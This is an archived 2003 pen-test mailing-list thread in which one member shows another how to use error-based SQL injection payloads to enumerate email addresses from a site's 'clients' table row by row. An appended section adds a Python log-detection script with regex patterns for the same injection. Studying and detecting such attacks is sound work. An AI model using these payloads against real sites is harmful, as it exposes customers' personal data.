RE: SQL injection - get more values
From: Brass, Phil (ISS Atlanta) (PBrass@iss.net)
Date: 02/12/03
Date: Wed, 12 Feb 2003 14:05:02 -0500
From: "Brass, Phil (ISS Atlanta)" <PBrass@iss.net>
To: "Daniel Savi" <dss@brturbo.com>, <pen-test@securityfocus.com>
I believe the solution you're looking for is the old min-where-order-by
trick.
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
Try this:
> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'a' order by 1)) %2b '
After you get the first value (say it's anon@isp.com), you throw it into
the where clause:
> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'anon@isp.com' order by 1)) %2b '
You get the next value, say it's axon@isp.com, then you do the next
query:
> ' %2b convert(int, (SELECT min(email) FROM clients WHERE email > 'axon@isp.com' order by 1)) %2b '
And so on, until you don't get an error. Of course, for most gratifying
results you write a little program that does this for you.
Phil
> -----Original Message-----
> From: Daniel Savi [mailto:dss@brturbo.com]
> Sent: Wednesday, February 12, 2003 12:49 PM
> To: pen-test@securityfocus.com
> Subject: SQL injection - get more values
>
> Hi :)
>
> I'm trying to get some info from the clients table and email field....
>
> I tried this param in gubpage.asp?=...
> ') union select sum(email) from clients--
> and got an error about all queries needed...so, I tried to solve it with
> ') union select sum(email),1,1,1.... from clients--
> until I got: operand type clash: text is incompatible with int
>
> I found this answer in this forum (thanks :)), it was:
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
>
> I got this:
> Syntax error converting the varchar value 'anon@isp.com' to a column of data type int
>
> Now, my problem: How can I get other e-mails from the table knowing one valid value?
>
> I tried this
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'anon@isp.com')) %2b '
> but no success
>
> I think I can use NOT IN, but I'm not sure how to use it with convert...
>
> Any tips are welcome!
>
> Thanks
>
> --------------------------------------------------------------
> --------------
> This list is provided by the SecurityFocus Security
> Intelligence Alert (SIA) Service. For more information on
> SecurityFocus' SIA service which automatically alerts you to
> the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
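
Added example, not part of the original thread: a defender-side log check for the request series described above, where one client repeats a `convert(int, (SELECT ...))` subquery while the `WHERE ... >` literal advances. The log layout, `/app/page.asp` and the `id` parameter are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

# convert(<type>, (SELECT ...)): a type conversion wrapped around a subquery,
# which leaks the selected value through the conversion error message.
CONVERT_SUBQUERY = re.compile(r"convert\s*\(\s*\w+\s*,\s*\(\s*select\b", re.I)
# The literal in "WHERE col > '...'" that changes on every step of the walk.
CURSOR = re.compile(r"where\s+[\w.]+\s*>\s*'([^']*)'", re.I)

def _sample_line(ip, literal):
    """Build one constructed log line carrying the thread's query shape."""
    payload = ("' + convert(int, (SELECT min(email) FROM clients "
               f"WHERE email > '{literal}' order by 1)) + '")
    return f"{ip} GET /app/page.asp id={quote(payload)} 500"

# Constructed sample log: "<client-ip> <method> <path> <query> <status>".
SAMPLE_LOG = "\n".join([
    "10.0.0.5 GET /app/page.asp id=7 200",
    _sample_line("10.0.0.9", "a"),
    "10.0.0.7 GET /app/search.asp q=convert%20int%20to%20text 200",
    _sample_line("10.0.0.9", "anon@isp.com"),
    _sample_line("10.0.0.9", "axon@isp.com"),
    _sample_line("10.0.0.9", "axon@isp.com"),  # retry of the same step
])

def find_enumeration(log_text, min_steps=3):
    """Map (client, path) -> ordered distinct WHERE literals, for clients that
    sent the convert-over-subquery pattern at least min_steps distinct times."""
    walks = defaultdict(list)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # not in the assumed layout
        ip, _method, path, raw_query, _status = fields
        query = unquote_plus(raw_query)  # %2b -> '+', %27 -> "'"
        if not CONVERT_SUBQUERY.search(query):
            continue
        match = CURSOR.search(query)
        literal = match.group(1) if match else ""
        if literal not in walks[(ip, path)]:
            walks[(ip, path)].append(literal)
    return {key: steps for key, steps in walks.items() if len(steps) >= min_steps}

if __name__ == "__main__":
    for (ip, path), steps in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip} walked {path} in {len(steps)} steps: {steps}")
```

A single match of the first pattern is already worth an alert; the grouping shows how far a client got, which helps scope what was exposed.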